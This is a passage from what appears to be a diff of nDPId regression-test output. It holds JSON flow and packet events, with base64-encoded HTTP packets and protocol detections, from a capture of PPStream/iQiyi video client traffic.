.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B
66X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"} -02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUa
lWIrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353195852,"pkt":"TF4M6gNlABxCjnAxCABFAAOkMjBAAIAGuBrAqHMIymwO7MZTAFDqT5aSVlCsgFAYQTeESwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxOTUwNTQmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsY
Xllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7560000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1467353196104,"pkt":"TF4M6gNlABxCjnAxCABFAAOJMkZAAIAGuC7AqHMIymwO3cZVAFB2diePbxSNNlAYAQSFkwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0yMDkmdG0zMT05NCZ0bTMyPTMxJnRtMzM9NzgmdG0zND0xJnRtND0xNzYmdG00MT00NyZ0bTQyPTE2JnRtNDM9NzgmdG00ND03JnRtNT0zMjgmdG01MT0wJnRtNTI9MCZ0bTUzPTAmdG01ND02MyZ0bTY9JnRtNjI9MCZ0bTYzPTAmdG03PTAmdG03MT0wJnRtNzI9MCZ0bTczPTAmdG04PTAmdG04MT0wJnRtODI9MCZ0bTgzPTAmdG05PTk2MiZ0bTkyPTE1JnRtOTM9Mjk3JmNoaXBpZD1JbnRlbCUyOFIlMjklMjBDb3JlJTI4VE0lMjklMjBpNSUyRDI1NTdNJTIwQ1BVJTIwJTQwJTIwMSUyRTcwR0h6JnJhPTEmaXNoY2RuPTImcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT0zMSZyPTQ3OTUzMTAwMCZhaWQ9MTgwOTMyMzAxJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPVdpbmRvd3MlMjA3JnY9NSUyRTIlMkUxNSUyRTIyNDAma3J2PTIlMkUwJTJFMTAyJmR0PSZodT0tMSZybj0xNDY3MzUzMTk1JmlzbG9jYWw9MCZhcz0wMzExYzVhMGQ1NTk2MDYzZGI1OTQ0YmQ3NmI2Y2JmZiZ2ZT1iMWY5MGY4ZGE2ZmUwMjU4ZDEzNjE2YTgwNzBjYjk5NyZwZT0mdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} 
+01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7560000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIE